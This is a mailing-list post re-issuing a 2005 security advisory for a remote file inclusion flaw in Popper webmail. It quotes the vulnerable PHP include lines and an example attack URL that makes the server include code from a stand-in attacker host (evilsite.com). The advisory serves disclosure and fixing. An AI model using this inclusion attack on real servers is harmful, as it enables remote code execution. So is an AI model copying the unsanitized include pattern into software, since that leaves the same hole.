<<< Date Index >>>     <<< Thread Index >>>

Popper webmail remote code execution vulnerability - advisory fix



Hi,

This advisory was already released on http://security.lss.hr, but there was a 
mistake in advisory page that marked vulnerable PHP line as HTML tag, so it 
wasn't
visible within web browser. That's why b0iler described it as a false positive 
(http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html).
I apologize for our mistake, here is fixed advisory.


----------------------------------------------------------------------------------

                                        LSS Security Advisory #LSS-2005-06-07
                                                http://security.lss.hr



 
Title: Popper webmail remote code execution vulnerability
Advisory ID: LSS-2005-06-07
Date: 2005-06-01
Advisory URL: http://security.lss.hr/index.php?page=details&ID=LSS-2005-06-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
Vendors Status: 7th March, 2005


 
==[ Overview

Popper is a webmail application written in PHP which allows users to read
and send their e-mail messages using a web browser. 
 


==[ Vulnerability

Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script
that can be abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:
--------
..
<?php
                if(file_exists($form.".toolbar.inc.php")) {
                        include($form.".toolbar.inc.php");
                }
?>
..
..
<?php include($form.".form.inc.php");?>
..
--------

To exploit this vulnerability, attacker has to put script like 
test.form.inc.php 
on www.evilsite.com HTTP server, and call url like this:
http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
Vulnerability can be exploited only if register_globals in php.ini file is set
to 'on'.


 
==[ Affected Version

All popper versions including latest 1.41-r2.


 
==[ Fix

Set register_globals to off.


 
==[ PoC Exploit

No PoC needed.


 
==[ Credits

Credits for this vulnerability goes to Leon Juranic <ljuranic@xxxxxx>.


 
==[ LSS Security Contact
 
LSS Security Team, 

WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775